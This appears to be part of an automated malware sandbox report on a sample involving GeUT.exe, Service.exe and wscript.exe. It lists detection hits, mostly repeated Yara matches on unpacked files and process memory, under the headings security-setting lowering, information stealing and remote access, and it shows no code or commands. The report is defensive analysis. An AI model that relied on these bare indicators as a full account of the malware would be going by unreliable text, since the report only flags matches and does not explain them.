Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: GeUT.exe.0.dr, Program.cs .Net Code: TaskMan
Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.cs .Net Code: TaskMan
Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.cs .Net Code: TaskMan
Source: Service.exe.2.dr, Program.cs .Net Code: TaskMan

Stealing of Sensitive Information

Source: Yara match File source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 4948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Service.exe PID: 7072, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 4948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Service.exe PID: 7072, type: MEMORYSTR
No contacted IP infos